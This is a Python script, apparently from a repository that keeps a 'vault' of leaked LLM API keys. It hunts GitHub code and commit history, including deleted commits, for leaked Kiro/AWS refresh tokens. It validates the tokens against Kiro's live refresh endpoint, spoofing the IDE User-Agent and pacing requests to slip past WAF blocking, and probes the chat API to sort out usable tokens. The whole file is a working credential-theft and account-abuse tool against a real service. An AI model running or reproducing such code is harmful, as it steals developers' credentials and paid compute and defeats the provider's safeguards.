- tools/scripts/llm-key-hunter: GitHub leak hunting pipeline (hunt_*, pivot miner, two-layer verify/content caches, per-provider verification) - usable_keys: verified key vault across 12 providers (deepseek, minimax, volcanoark, longcat, codingplan, zhipu free-tier, mimo, siliconflow, etc.) - .grok/skills/llm-key-hunter: operator skill for the hunt/verify/vault flow - NewAPI channel import scripts and CDP capture helpers - Result verdict buckets (excluding multi-GB blob caches and dedup dumps)
428 lines
18 KiB
Python
428 lines
18 KiB
Python
#!/usr/bin/env python3
|
|
"""Kiro hunter v2 — correct token format + commit-history scan.
|
|
|
|
Real Kiro tokens are NOT JWTs. They're opaque AWS-blessed strings:
|
|
accessToken: aoaAAAAA... (base64, contains '+' '/' and sometimes ':')
|
|
refreshToken: aorAAAAA... (~180 chars)
|
|
Found in files named kiro-auth-token*.json, ~/.aws/sso/cache/*.json, or in
|
|
KIRO_AUTH_TOKEN JSON arrays / KIRO_REFRESH_TOKEN env vars.
|
|
|
|
Pipeline:
|
|
1. GitHub code search for files named kiro-auth-token / .aws/sso/cache kiro, plus
|
|
the aoaAAAAA/aorAAAAA token prefixes.
|
|
2. Fetch raw content (HEAD) and extract access/refresh tokens.
|
|
3. Commit-history scan: for repos that touched kiro-auth-token files, walk
|
|
recent commits and grep the patch for aorAAAAA tokens (catches deleted ones).
|
|
4. Verify each refresh token via prod.us-east-1.auth.desktop.kiro.dev/refreshToken.
|
|
200+accessToken = USABLE (then optional chat probe); 401 = DEAD; else kept.
|
|
|
|
GitHub and the kiro.dev refresh endpoint are GFW-blocked; all traffic routes via
|
|
GH_PROXY (a CN proxy known to reach both).
|
|
|
|
Outputs results/kiro2/{usable,no_balance,no_access,unknown,dead,all_non_401}.txt
|
|
"""
|
|
|
|
import argparse, base64, json, os, re, subprocess, sys, time, uuid
|
|
import urllib.request, urllib.error, urllib.parse
|
|
from concurrent.futures import ThreadPoolExecutor, as_completed
|
|
from pathlib import Path
|
|
|
|
HERE = Path(__file__).parent
|
|
RESULTS = HERE / "results" / "kiro2"
|
|
RESULTS.mkdir(parents=True, exist_ok=True)
|
|
|
|
GH_PROXY = os.environ.get("GH_PROXY", "http://114.111.19.228:3389")
|
|
REFRESH_URL = "https://prod.us-east-1.auth.desktop.kiro.dev/refreshToken"
|
|
CHAT_URL = "https://q.us-east-1.amazonaws.com/generateAssistantResponse"
|
|
UA = "curl/8.5.0"
|
|
# Min seconds between refresh-endpoint posts. Too aggressive and CloudFront WAF
|
|
# 403-blocks the whole IP for several minutes.
|
|
VERIFY_DELAY = float(os.environ.get("KIRO_VERIFY_DELAY", "0.4"))
|
|
|
|
# Real token prefixes. Allow base64 alphabet including + and /.
|
|
ACCESS_RE = re.compile(r"aoaAAAAA[A-Za-z0-9+/=_:\-]{40,}")
|
|
REFRESH_RE = re.compile(r"aorAAAAA[A-Za-z0-9+/=_:\-]{40,}")
|
|
|
|
QUERIES = [
|
|
"filename:kiro-auth-token",
|
|
"kiro-auth-token.json",
|
|
"kiro-auth-token extension:json",
|
|
'"aorAAAAA"',
|
|
'"aoaAAAAA"',
|
|
'"accessToken" "refreshToken" "kiro" extension:json',
|
|
'"refreshToken" "aorAAAAA"',
|
|
'"clientIdHash" "refreshToken" extension:json',
|
|
'"profileArn" "refreshToken" "kiro"',
|
|
'"authMethod" "refreshToken" "kiro" extension:json',
|
|
'KIRO_REFRESH_TOKEN=aor',
|
|
'KIRO_AUTH_TOKEN aorAAAAA',
|
|
'"prod.us-east-1.auth.desktop.kiro.dev" "refreshToken"',
|
|
"kiro sso cache extension:json",
|
|
'"kiro" "aorAAAAA"',
|
|
'"codewhisperer" "refreshToken" extension:json',
|
|
]
|
|
|
|
|
|
_opener = None
|
|
def opener():
|
|
global _opener
|
|
if _opener is None:
|
|
h = urllib.request.ProxyHandler({"http": GH_PROXY, "https": GH_PROXY}) if GH_PROXY else urllib.request.ProxyHandler({})
|
|
_opener = urllib.request.build_opener(h)
|
|
return _opener
|
|
|
|
_direct = None
|
|
def direct_opener():
|
|
"""Opener that bypasses GH_PROXY. The CN proxy returns CloudFront 403 for the
|
|
Kiro refresh/chat endpoints, but they are directly reachable from this host."""
|
|
global _direct
|
|
if _direct is None:
|
|
_direct = urllib.request.build_opener(urllib.request.ProxyHandler({}))
|
|
return _direct
|
|
|
|
|
|
def github_token():
|
|
t = os.environ.get("GITHUB_TOKEN") or os.environ.get("GH_TOKEN")
|
|
if t: return t
|
|
try:
|
|
o = subprocess.run(["gh","auth","token"],capture_output=True,text=True,timeout=10)
|
|
if o.returncode==0: return o.stdout.strip()
|
|
except FileNotFoundError: pass
|
|
p = Path.home()/".config/gh/hosts.yml"
|
|
if p.exists():
|
|
for line in p.read_text().splitlines():
|
|
if line.strip().startswith("oauth_token:"):
|
|
return line.split(":",1)[1].strip()
|
|
return None
|
|
|
|
|
|
def gh_get(url, token, timeout=30):
|
|
headers = {"Accept":"application/vnd.github+json","User-Agent":"kiro-hunter"}
|
|
if token: headers["Authorization"]=f"Bearer {token}"
|
|
req = urllib.request.Request(url, headers=headers)
|
|
try:
|
|
with opener().open(req, timeout=timeout) as r:
|
|
return r.getcode(), r.read().decode("utf-8","replace"), dict(r.headers)
|
|
except urllib.error.HTTPError as e:
|
|
try: body=e.read().decode("utf-8","replace")
|
|
except Exception: body=""
|
|
return e.code, body, dict(e.headers or {})
|
|
except Exception as e:
|
|
return 0, f"net:{e}", {}
|
|
|
|
|
|
def search_code(query, token, per_page=100):
|
|
for page in range(1,11):
|
|
url=("https://api.github.com/search/code"
|
|
f"?q={urllib.parse.quote(query)}&per_page={per_page}&page={page}")
|
|
code,body,hdrs = gh_get(url,token)
|
|
if code==200:
|
|
try: data=json.loads(body)
|
|
except Exception: return
|
|
items=data.get("items",[])
|
|
for it in items: yield it
|
|
if len(items)<per_page: return
|
|
time.sleep(2.2)
|
|
elif code in (403,429):
|
|
reset=hdrs.get("X-RateLimit-Reset")
|
|
wait=max(int(reset)-int(time.time()),5) if reset else 30
|
|
print(f" rate-limited {wait}s",file=sys.stderr,flush=True)
|
|
time.sleep(wait+1)
|
|
elif code==422:
|
|
return
|
|
else:
|
|
print(f" search {code} for {query!r}",file=sys.stderr); return
|
|
|
|
|
|
def to_raw(u):
|
|
return u.replace("github.com","raw.githubusercontent.com").replace("/blob/","/")
|
|
|
|
|
|
def fetch_raw(url, timeout=20):
|
|
try:
|
|
with opener().open(urllib.request.Request(url,headers={"User-Agent":"Mozilla/5.0"}),timeout=timeout) as r:
|
|
return r.read().decode("utf-8","replace")
|
|
except Exception:
|
|
return ""
|
|
|
|
|
|
def clean(t):
|
|
# trim trailing base64 padding-separators / json punctuation that regex may over-grab
|
|
return t.rstrip('",;:}]= \t\r\n')
|
|
|
|
|
|
def extract(content):
|
|
out = {} # refresh -> {access, source_hint}
|
|
for m in REFRESH_RE.findall(content):
|
|
rt = clean(m)
|
|
# Real Kiro refresh tokens are opaque base64 ~180-260 chars. Reject
|
|
# binary/garbage runs that merely start with "aorAAAAA" (these produce
|
|
# multi-KB blobs and trigger AWS WAF 403 on the refresh endpoint).
|
|
if 120 <= len(rt) <= 400:
|
|
out.setdefault(rt, {})
|
|
for m in ACCESS_RE.findall(content):
|
|
at = clean(m)
|
|
if 120 <= len(at) <= 2000:
|
|
for rt in out:
|
|
out[rt].setdefault("access", at)
|
|
return out
|
|
|
|
|
|
def list_file_commits(repo, path, token, max_commits=15):
|
|
"""List commits that touched a specific file (bounded). Much cheaper than
|
|
walking a whole repo's history."""
|
|
q=urllib.parse.quote(path, safe="")
|
|
url=f"https://api.github.com/repos/{repo}/commits?path={q}&per_page={max_commits}&page=1"
|
|
code,body,hdrs=gh_get(url,token,timeout=15)
|
|
if code in (403,429):
|
|
reset=hdrs.get("X-RateLimit-Reset")
|
|
wait=min(max(int(reset)-int(time.time()),5), 60) if reset else 20
|
|
time.sleep(wait+1)
|
|
code,body,_=gh_get(url,token,timeout=15)
|
|
if code!=200: return
|
|
try: data=json.loads(body)
|
|
except Exception: return
|
|
if not isinstance(data,list): return
|
|
for c in data:
|
|
sha=c.get("sha")
|
|
if sha: yield sha
|
|
|
|
|
|
def commit_patch(repo, sha, token):
|
|
"""Return the patch text for a commit (the diff)."""
|
|
url=f"https://api.github.com/repos/{repo}/commits/{sha}"
|
|
headers={"Accept":"application/vnd.github.v3.diff","User-Agent":"kiro-hunter"}
|
|
if token: headers["Authorization"]=f"Bearer {token}"
|
|
req=urllib.request.Request(url,headers=headers)
|
|
try:
|
|
with opener().open(req,timeout=20) as r:
|
|
return r.read().decode("utf-8","replace")
|
|
except Exception:
|
|
return ""
|
|
|
|
|
|
def scan_repo_commits(repo, paths, token, max_commits):
|
|
"""Scan commits touching specific files in one repo; return {rt: source}."""
|
|
found={}
|
|
seen=set()
|
|
for path in paths:
|
|
try:
|
|
shas=list(list_file_commits(repo,path,token,max_commits=max_commits))
|
|
except Exception:
|
|
continue
|
|
for sha in shas:
|
|
if sha in seen: continue
|
|
seen.add(sha)
|
|
patch=commit_patch(repo,sha,token)
|
|
if "aorAAAAA" not in patch: continue
|
|
for rt in extract(patch):
|
|
found[rt]=f"{repo}@{sha[:10]} (commit diff)"
|
|
return found
|
|
|
|
|
|
def http_post(url, body, headers, timeout=30):
|
|
h={"User-Agent":UA,"Accept":"*/*","Content-Type":"application/json",**headers}
|
|
data=json.dumps(body).encode()
|
|
req=urllib.request.Request(url,data=data,headers=h,method="POST")
|
|
op = direct_opener() if "kiro.dev" in url or "amazonaws.com" in url else opener()
|
|
try:
|
|
with op.open(req,timeout=timeout) as r:
|
|
return r.getcode(), r.read().decode("utf-8","replace")
|
|
except urllib.error.HTTPError as e:
|
|
try: return e.code, e.read().decode("utf-8","replace")
|
|
except Exception: return e.code, ""
|
|
except Exception as e:
|
|
return 0, f"net:{type(e).__name__}:{e}"
|
|
|
|
|
|
def verify_rt(rt, do_chat=False):
|
|
# CloudFront WAF occasionally returns a 403 HTML "Request blocked" when we
|
|
# fire too fast. Retry with backoff so a transient block doesn't permanently
|
|
# misclassify a token as NO_ACCESS.
|
|
import threading as _t
|
|
global _verify_lock, _last_post
|
|
try:
|
|
_verify_lock
|
|
except NameError:
|
|
_verify_lock=_t.Lock(); _last_post=0.0
|
|
code=body=None
|
|
for attempt in range(4):
|
|
with _verify_lock:
|
|
gap=time.time()-_last_post
|
|
if gap<VERIFY_DELAY:
|
|
time.sleep(VERIFY_DELAY-gap)
|
|
_last_post=time.time()
|
|
code,body=http_post(REFRESH_URL,{"refreshToken":rt},
|
|
{"User-Agent":f"KiroIDE-1.6.0-{uuid.uuid4().hex[:16]}"})
|
|
if code==403 and "<!DOCTYPE" in body:
|
|
time.sleep(20*(attempt+1)) # back off from WAF
|
|
continue
|
|
break
|
|
access=expires=None
|
|
if code==200:
|
|
try:
|
|
j=json.loads(body)
|
|
access=j.get("accessToken") or j.get("access_token")
|
|
expires=j.get("expiresIn") or j.get("expires_in")
|
|
except Exception: pass
|
|
if access and do_chat:
|
|
cc,cb=chat_probe(access)
|
|
if cc==200: return "USABLE",f"refresh OK; chat 200; exp={expires}",access
|
|
if cc in (402,429): return "NO_BALANCE",f"refresh OK; chat {cc}: {cb[:100]}",access
|
|
if cc==0: return "NO_ACCESS",f"refresh OK; chat net: {cb[:100]}",access
|
|
return "NO_ACCESS",f"refresh OK; chat HTTP {cc}: {cb[:100]}",access
|
|
return "USABLE" if access else "NO_ACCESS", f"refresh 200 no accessToken: {body[:100]}", access
|
|
if code==401: return "DEAD", f"401 {body[:80]}", None
|
|
if code in (402,429): return "NO_BALANCE", f"{code} {body[:100]}", None
|
|
if code==0: return "UNKNOWN", body[:120], None
|
|
return "NO_ACCESS", f"HTTP {code}: {body[:100]}", None
|
|
|
|
|
|
def chat_probe(access):
|
|
cid=str(uuid.uuid4()); aid=str(uuid.uuid4())
|
|
body={"conversationState":{
|
|
"agentContinuationId":aid,"agentTaskType":"vibe","chatTriggerType":"MANUAL",
|
|
"conversationId":cid,
|
|
"currentMessage":{"userInputMessage":{"content":"hi","modelId":"claude-haiku-4.5","origin":"AI_EDITOR"}},
|
|
"history":[]}}
|
|
headers={"x-amzn-codewhisperer-optout":"true","x-amzn-kiro-agent-mode":"vibe",
|
|
"Authorization":f"Bearer {access}","Host":"q.us-east-1.amazonaws.com",
|
|
"amz-sdk-invocation-id":str(uuid.uuid4()),"amz-sdk-request":"attempt=1; max=1",
|
|
"User-Agent":f"aws-sdk-js/1.0.27 KiroIDE-1.6.0-{uuid.uuid4().hex[:16]}"}
|
|
return http_post(CHAT_URL,body,headers,timeout=40)
|
|
|
|
|
|
def main():
|
|
ap=argparse.ArgumentParser()
|
|
ap.add_argument("--verify-only",action="store_true")
|
|
ap.add_argument("--workers",type=int,default=15)
|
|
ap.add_argument("--scan-commits",action="store_true",
|
|
help="Walk commit history of touched repos to find deleted tokens")
|
|
ap.add_argument("--commit-pages",type=int,default=2)
|
|
ap.add_argument("--commit-workers",type=int,default=12,
|
|
help="Parallel repos for the commit-history scan")
|
|
ap.add_argument("--chat",action="store_true",help="Do a live chat probe on usable tokens")
|
|
args=ap.parse_args()
|
|
|
|
token=github_token()
|
|
print(f"proxy={GH_PROXY} token={'yes' if token else 'no'} scan_commits={args.scan_commits}",flush=True)
|
|
rts={} # refresh -> source
|
|
|
|
if args.verify_only:
|
|
ef=RESULTS/"refresh_tokens.txt"
|
|
if ef.exists():
|
|
for line in ef.read_text().splitlines():
|
|
if "|" in line:
|
|
rt,src=line.split("|",1)
|
|
rts[rt]=src
|
|
print(f"verify-only: {len(rts)} tokens",flush=True)
|
|
else:
|
|
print("\n=== Stage 1: code search ===",flush=True)
|
|
files={}
|
|
for i,q in enumerate(QUERIES,1):
|
|
print(f" [{i:2d}/{len(QUERIES)}] {q}",flush=True)
|
|
try:
|
|
for it in search_code(q,token):
|
|
u=it.get("html_url","")
|
|
if u: files[u]=it.get("repository",{}).get("full_name","?")
|
|
except Exception as e:
|
|
print(" err",e,file=sys.stderr)
|
|
print(f" candidate files: {len(files)}",flush=True)
|
|
|
|
# extract from HEAD raw
|
|
print("\n=== Stage 2a: HEAD raw extraction ===",flush=True)
|
|
done=0
|
|
repo_paths={} # repo -> set(paths)
|
|
with ThreadPoolExecutor(max_workers=20) as pool:
|
|
futs={pool.submit(fetch_raw,to_raw(u)):(u,repo) for u,repo in files.items()}
|
|
for f in as_completed(futs):
|
|
u,repo=futs[f]; done+=1
|
|
# derive file path from html url: https://github.com/{repo}/blob/{branch}/{path}
|
|
try:
|
|
parts=u.split("/blob/",1)
|
|
if len(parts)==2:
|
|
path=parts[1].split("/",1)[1] # drop ref
|
|
repo_paths.setdefault(repo,set()).add(path)
|
|
except Exception:
|
|
pass
|
|
try: content=f.result()
|
|
except Exception: content=""
|
|
for rt in extract(content):
|
|
rts.setdefault(rt,u)
|
|
if done%200==0:
|
|
print(f" {done}/{len(files)} tokens={len(rts)}",flush=True)
|
|
nfiles=sum(len(v) for v in repo_paths.values())
|
|
print(f" after HEAD: {len(rts)} refresh tokens; {len(repo_paths)} repos, {nfiles} tracked files",flush=True)
|
|
|
|
# durable checkpoint of HEAD tokens before the slow commit scan
|
|
with open(RESULTS/"refresh_tokens.txt","w") as f:
|
|
for rt,src in sorted(rts.items()):
|
|
f.write(f"{rt}|{src}\n")
|
|
|
|
if args.scan_commits:
|
|
print(f"\n=== Stage 2b: per-file commit-history scan (max {args.commit_pages} commits/file, {args.commit_workers} workers) ===",flush=True)
|
|
repo_list=sorted(repo_paths)
|
|
scanned=0; lock=__import__("threading").Lock()
|
|
def _job(repo):
|
|
return repo, scan_repo_commits(repo,repo_paths[repo],token,args.commit_pages)
|
|
with ThreadPoolExecutor(max_workers=args.commit_workers) as pool:
|
|
futs={pool.submit(_job,repo):repo for repo in repo_list}
|
|
for f in as_completed(futs):
|
|
repo=futs[f]; scanned+=1
|
|
try:
|
|
_,found=f.result()
|
|
except Exception:
|
|
found={}
|
|
new=0
|
|
if found:
|
|
with lock:
|
|
before=len(rts)
|
|
for rt,src in found.items():
|
|
rts.setdefault(rt,src)
|
|
new=len(rts)-before
|
|
if new:
|
|
print(f" [{scanned}/{len(repo_list)}] {repo}: +{new} (total {len(rts)})",flush=True)
|
|
if scanned%25==0:
|
|
print(f" scanned {scanned}/{len(repo_list)} repos, tokens={len(rts)}",flush=True)
|
|
with open(RESULTS/"refresh_tokens.txt","w") as f:
|
|
for rt,src in sorted(rts.items()):
|
|
f.write(f"{rt}|{src}\n")
|
|
|
|
with open(RESULTS/"refresh_tokens.txt","w") as f:
|
|
for rt,src in sorted(rts.items()):
|
|
f.write(f"{rt}|{src}\n")
|
|
print(f" saved {len(rts)} tokens -> refresh_tokens.txt",flush=True)
|
|
|
|
print(f"\n=== Stage 3: verify {len(rts)} refresh tokens (workers={args.workers}) ===",flush=True)
|
|
buckets={"USABLE":[],"NO_BALANCE":[],"NO_ACCESS":[],"UNKNOWN":[],"DEAD":[]}
|
|
start=time.time(); done=0
|
|
with ThreadPoolExecutor(max_workers=args.workers) as pool:
|
|
futs={pool.submit(verify_rt,rt,args.chat):(rt,src) for rt,src in rts.items()}
|
|
for f in as_completed(futs):
|
|
rt,src=futs[f]; done+=1
|
|
try: v,detail,access=f.result()
|
|
except Exception as e: v,detail,access="UNKNOWN",f"exc:{e}",None
|
|
buckets[v].append((rt,src,access,detail))
|
|
if done%10==0:
|
|
el=time.time()-start
|
|
print(f" [{done:4d}/{len(rts)}] "+" ".join(f"{k.lower()}={len(buckets[k])}" for k in buckets)+f" ({done/el:.1f}/s)",flush=True)
|
|
|
|
for name,items in buckets.items():
|
|
with open(RESULTS/f"{name.lower()}.txt","w") as f:
|
|
for rt,src,access,detail in items:
|
|
f.write(f"{rt}|{src}|access={access or ''}|{detail}\n")
|
|
print(f" {name:11s}: {len(items):4d}",flush=True)
|
|
with open(RESULTS/"all_non_401.txt","w") as f:
|
|
for name in ("USABLE","NO_BALANCE","NO_ACCESS","UNKNOWN"):
|
|
for rt,src,access,detail in buckets[name]:
|
|
f.write(f"{name}|{rt}|{src}|access={access or ''}|{detail}\n")
|
|
|
|
if buckets["USABLE"]:
|
|
print("\n=== USABLE KIRO TOKENS ===",flush=True)
|
|
for rt,src,access,detail in buckets["USABLE"]:
|
|
print(f" refresh: {rt[:45]}...{rt[-8:]}\n src: {src}\n {detail}\n",flush=True)
|
|
|
|
|
|
if __name__=="__main__":
|
|
main()
|